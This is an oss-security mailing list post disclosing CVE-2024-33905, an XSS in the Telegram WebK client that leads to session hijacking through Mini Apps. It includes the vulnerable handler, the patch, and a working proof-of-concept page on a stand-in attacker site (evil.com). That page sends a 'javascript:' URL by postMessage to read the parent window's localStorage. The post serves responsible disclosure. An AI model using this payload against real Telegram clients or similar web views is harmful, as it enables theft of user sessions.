'[oss-security] Re: Telegram Web app XSS / Session Hijacking 1-click'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: Telegram Web app XSS / Session Hijacking 1-click
From:       Pedro Batista <pedbap.g () gmail ! com>
Date:       2024-04-30 9:30:09
Message-ID: CAD44bnO8ggssLh-DcW4Hm0FOAOWjNm0-0NWAzca7f_oKOrAyrA () mail ! gmail ! com
[Download RAW message or body]


CVE-2024-33905

On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <pedbap.g@gmail.com> wrote:

> Hi oss-security,
> I would like to share a vulnerability I reported on Telegram Web
> application which is Open Source (https://github.com/morethanwords/tweb).
> The vulnerability is a XSS that can be exploited to achieve session
> hijacking with 1-click using Telegram Mini Apps.
> 
> I reported the vulnerability on March 9th, 2024 and Telegram promptly
> fixed it on March 11th, 2024.
> 
> # Vulnerable version: Telegram WebK 2.0.0 (486) and below
> # Fixed version: Telegram WebK 2.0.0 (488)
> 
> # Attack Surface
> ## Telegram Mini Apps
> "Telegram Mini Apps are essentially web applications that you can run
> directly within the Telegram messenger interface. Mini Apps support
> seamless authorization, integrated crypto and fiat payments (via Google Pay
> and Apple Pay), tailored push notifications, and more."
> 
> > https://core.telegram.org/bots/webapps
> > https://ton.org/mini-apps
> 
> Is important to highlight that this feature is heavily used for crypto
> payments in the TON Blockchain.
> 
> # Static Analysis
> A cached version of the vulnerable file can be found here:
> - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
> 
> ```
> telegramWebView.addMultipleEventsListeners({
> // [...]
> web_app_open_link:({url:t})=>{window.open(t,"_blank")}
> }
> ```
> The vulnerability was triggered with `postMessage` communication by
> abusing the event `web_app_open_link` which allowed a new URL to remain
> with the javascript context of the parent window using the `javascript:`
> scheme as XSS payload.
> 
> # Weaponized Setup
> 1. Attacker creates a Bot + Mini App
> 2. Sets the URL of the Mini App => https://evil.com/homepage.html
> 3. The exploit will be hosted in the homepage of the attacker's site
> 3.1. homepage.html
> ```
> <body onload=exploit()>
> <script>
> function exploit() {
> window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link',
> eventData: {url:
> "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*'); }
> </script>
> </body>
> ```
> 
> # Telegram Patch Commit
> 
> https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts
>  
> ```
> export default function
> safeWindowOpen(url: string) {
> window.open(url, '_blank', 'noreferrer');
> }
> ```
> 
> # Demo
> I have published a writeup for this finding which includes the Exploit
> Demo, it's available here:
> 
> 
> https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90
> 
> I recently requested a CVE for this vulnerability as well, looking forward
> to updating the thread as soon as it is issued.
> 
> Thanks for looking into my report.
> 
> Best regards,
> Pedro Baptista
> 



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic